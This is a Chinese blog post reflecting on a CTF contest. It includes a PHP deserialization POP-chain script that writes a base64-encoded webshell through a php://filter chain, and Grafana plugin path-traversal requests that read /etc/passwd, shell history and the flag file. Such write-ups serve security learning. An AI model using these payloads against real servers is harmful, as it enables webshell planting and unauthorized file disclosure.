首页 > 其他分享 >天权信安ctf收获

天权信安ctf收获

时间:2022-12-11 19:45:53浏览次数:42  
标签:gettingstarted .. 信安 ctf burp plugins 天权 php public

这是前两天打天权信安时做出的两道题(web有六道题),这也是当时打比赛过程中保存的payload,今天简单记录一下这次比赛的收获。

这是pop那道

<?php 
class catf1ag1{ 
    public $hzy; 
    public $arr; 
} 

class catf1ag2{ 
    public $file;
    public $txt; 
} 
$a = new catf1ag1();
$b = new catf1ag2();
$a->arr = array("pputut");
$a->hzy = $b;
$b->txt = "PD9waHAgc3lzdGVtKCdjYXQgL2ZsYWcnKSA/Pg==";
$b->file = "php://filter/write=string.strip_tags|convert.base64-decode/resource=1.php";
//$b->file = "php://filterring.strip_tags|convert.base64-decode/resource=shell.php";
echo serialize($a);
?>

这是当时构造那个pop链的脚本,这个pop链并不难,攻击口也是常见的die函数+file_put_contents函数的死亡绕过,当时想着很快就能做出来了,结果不尽人意,然后也找出了原因,当时写入木马后(用的burp自带的那个浏览器),去访问木马文件了,这个过程我详细说一下(当时我在burp中代理拦截了以后,post了payload,用burp的重发器弄的,然后选的下边图片中的选项,在浏览器中打开来看看结果,结果都正常,但是切换url中的文件时,问题出现了,出了burp的一个报错,我以为是我的payload出了问题,也试了好多遍,找不到原因,然后在google浏览器中打开我写木马的那个文件,发现木马起作用了,有点意外。)

这是grafana那道。

一看环境很熟悉,就是前一段时间打字节跳动ctf的一个环境,不过那个比较复杂,这个比较简单,直接找对应版本的poc就可以打穿,然后访问历史命令文件,根据历史命令判断flag文件位置即可。

/public/plugins/gettingstarted/../../../../../../../../../../../../../../../home/grafana/.bash_history

/public/plugins/gettingstarted/../../../../../../../../../../../../../../../start.sh

/public/plugins/gettingstarted/../../../../../../../../../../../../../../../etc/passwd

/public/plugins/gettingstarted/../../../../../../../../../../../../../../../../home/grafana/f1ag

总之,技术的高低跟你的磨练程度是密不可分的,继续加油。

标签:gettingstarted,..,信安,ctf,burp,plugins,天权,php,public
From: https://www.cnblogs.com/yhchen-blogs/p/16974259.html

相关文章

  • [BUUCTF][WEB][极客大挑战 2019]Http 1
    打开靶机提供的url右键查看网页源代码发现一个链接(Secret.php),访问看看返回:Itdoesn'tcomefrom'https://Sycsecret.buuoj.cn'这是个题眼通过burpsuite拦截请求......
  • [BUUCTF][WEB][极客大挑战 2019]Knife 1
    这题几乎是送分题目不断暗示,后台存在一句话木马拿个蚁剑连上去就完事了这里用curl连上去,演示一下,理解一下其中的原理#注意phpinfo()后面的分号不能省curl-d"Syc......
  • [BUUCTF][Web][极客大挑战 2019]LoveSQL 1
    打开靶机url,页面显示有两个输入框,框中输入123',发现两个框都有sql注入问题爆出一下错误YouhaveanerrorinyourSQLsyntax;checkthemanualthatcorrespondstoy......
  • [BUUCTF][Web][极客大挑战 2019]Secret File 1
    打开靶机对应的url右键查看网页源代码,查看到一个访问路径/Archive_room.php构造url访问一下http://3bfaebad-fdfa-4226-ae0a-551f0228becb.node4.buuoj.cn:81/Archive_......
  • buuoj-pwn-ACTF_2019_message
    buuoj-pwn-ACTF_2019_message总结低版本存在uaf时优先考虑doublefree给信号注册函数的函数signal()逆向分析glibc版本ubuntu18.04也就是glibc2.27对于这道题,我们......
  • 首届“天权信安&catf1ag”网络安全联合公开赛之RE遗失的物品复现
    这个题目赛后看了看wp,感觉是能做出来的,第一题的checkin脱完魔改的upx壳,最后卡在数据那块了。打开遗失的物品发现是一个apk文件.我们来复习一下apk文件的文件结构一个AP......
  • BUUCTF之[BJDCTF2020]BJD hamburger competition (复现)
    一个老八把我整不会了,看其他师傅的wp才知道,这个是C#和unity开发的游戏,所以我们用dnspy进行反编译下面是复现过程看到是unity程序,上网查了相关参考,一般是用js或者c#进行......
  • NCTF2022 - pwn 部分 wp
    总的来说我出的几题不是很难,主要是想把自己感觉有意思的一些东西分享给大家。ezlogin程序设计周大作业稍加改编出的题目。洞在Tea里,有个数组越界写,为了避开​​\x00​​​截......
  • 首届“天权信安&catf1ag”网络安全联合公开赛misc部分wp
    简单隐写binwalk分离得到两个压缩包,均带有密码  ARCHPR加载提示不是RAR文件  JPHS可以得到分离出压缩包密码    catf1agcatf1agcatf1ag解压得到fl......
  • angr_ctf——从0学习angr(四):库操作和溢出漏洞利用
    angr_ctf项目中后面13~17题没有新的成块的有关angr的知识了,只是对之前题目使用到的模块的扩展和补充,因此就不先列知识点和使用方式了,直接在实战中边讲解边说明库操作13_a......